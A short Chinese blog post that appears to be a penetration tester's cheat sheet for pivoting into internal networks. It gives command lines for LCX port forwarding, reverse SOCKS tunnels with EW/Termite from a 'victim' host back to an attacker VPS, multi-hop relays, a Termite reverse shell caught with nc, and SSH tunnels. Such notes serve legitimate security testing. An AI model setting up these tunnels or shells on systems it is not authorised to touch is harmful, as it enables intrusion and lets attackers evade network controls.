Web

内网代理

内网代理的个人总结.

Posted by Rootclay on 2017-07-25

总结自己在实际运用过程中遇到的代理总结

0x00 引言

早期我们可能会采用HTTP Proxy代理,在浏览器上设置下代理服务器的IP、端口、认证账户和密码。但有些软件的网络通信数据并不是HTTP协议,就需要寻找其它方法。

SOCKS代理是个不错的解决方案,不管应用层是什么协议,只要是传输层是TCP协议就可以代理。SOCKS代理中最新的协议是SOCKS5。相对SOCKS4作了大幅度的增强。

首先,它增加了对UDP协议的支持;其次,可支持多种用户身份验证方式和通信加密方式;最后,修改了SOCKS服务器进行域名解析的方法,使其更加优雅。

0x01 端口转发

我们平常用到的LCX只能做到端口对端口的转发:

1、 VPS

1
lcx.exe –listen 8080 80

2、 受害机

1
lcx.exe –slave X.X.X.X 80 127.0.0.1 80

本地80端口转发到远程80

3、 Attacker

1
http://X.X.X.X:8080

0x02 工具

Socks代理工具我用到的主要如下:

Termite(原EW代理)

EW不用说,肯定大家应该都用过,这里把原EW的简单用法和Termite的简单用法都写一下

EW

1、 VPS:

1
ew -s rcsocks -l 1080 -e 8888

2、 受害机

1
ew -s rssocks -d 112.74.201.135 -e 8888

Termite

1、 Server

1
2
3
4
agent -l 8888
构建更加深的网络:
已控制的主机连接进入代理网络:
agent -c x.x.x.x -p 8888

2、 admin管理

1
admin -c x.x.x.x -p 8888

进入代理之后:

3、 深层网络连接

1
2
3
4
5
6
exmple:
Host3:192.168.3.1
Host4:192.168.3.2
1. 在Host4上:agent -l 8888
2. goto 3 connect 192.168.3.2 8888可以把

4、 代理进入机器

1
2
3
1. goto ID
2. socks 1080
3. 本地连接127.0.0.1 1080就可以了

5、 TCP端口转发

1
2
3
4
1. goto 2
2. lcxtran 3388 10.0.0.1 3389
以2号节点为跳板,将 10.0.0.1 的 3389 端口映射至本地的 3388 端口
3. 连接就只需要本地连接127.0.0.1 的3388端口

6、 Shell反弹

1
2
3
4
1. goto 1
2. shell 7777
此时,通过nc本地的 7777 端口,就可以得到一个 1 节点提供的 shell.
3. nc 127.0.0.1 7777 就是一个1号机的shell

SSH

转发

1
2
3
1. ssh -CfNg -R 2222:127.0.0.1:22 VPS-user@VPS -p 53 //内网
2. ssh -CfNg -L 8080:127.0.0.1:2222 VPS-user@VPS //VPS
本地访问VPS:8080就是内网的22端口

socket代理

1
2
ssh -qTfnN -D port remotehost
在终端中运行 ssh -qTfnN -D 6080 user@theserver ,然后在浏览器或者软件中设置好代理参数 socks5: 127.0.0.1:6080 后便可以使用.